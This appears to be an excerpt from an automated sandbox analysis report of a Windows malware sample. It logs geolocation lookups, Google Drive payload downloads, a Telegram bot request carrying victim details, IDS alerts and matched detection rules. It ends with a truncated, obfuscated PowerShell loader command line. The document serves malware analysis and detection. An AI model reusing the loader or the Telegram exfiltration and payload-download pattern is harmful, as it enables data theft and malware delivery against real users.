Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2024/10/2024%20/%2003:15:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49982 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49979 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49987 -> 188.114.96.3:443 |
Source: Network traffic |
Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49983 -> 188.114.96.3:443 |
Source: Network traffic |
Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49981 -> 188.114.96.3:443 |
Source: Network traffic |
Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49991 -> 188.114.96.3:443 |
Source: Network traffic |
Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49970 -> 142.250.185.206:443 |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2024/10/2024%20/%2003:15:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000002.00000002.1497034651.0000028F56895000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1522950843.0000028F64B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.1497034651.0000028F54AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1688588153.00000000044B1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.1497034651.0000028F54AE1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000005.00000002.1688588153.00000000044B1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: msiexec.exe, 00000007.00000002.2618677308.00000000253A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=en |
Source: msiexec.exe, 00000007.00000002.2618677308.00000000253A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=en8 |
Source: msiexec.exe, 00000007.00000002.2618677308.00000000253AB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=enlB |
Source: powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.1497034651.0000028F56857000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000002.00000002.1497034651.0000028F54D07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F56857000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000002.00000002.1497034651.0000028F54D07000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCyP |
Source: powershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCyXR |
Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F77000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F77000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy&export=download |
Source: powershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.1497034651.0000028F55712000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.1522950843.0000028F64B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49985 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49983 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49995 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49970 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49740 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49981 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49980 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49989 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49746 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49980 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49977 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49977 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49996 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49995 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49996 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49993 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49970 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49991 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49740 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49985 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49987 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49983 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49981 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49991 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49993 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49989 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49746 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49987 |
Source: amsi32_1516.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 1516, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselv |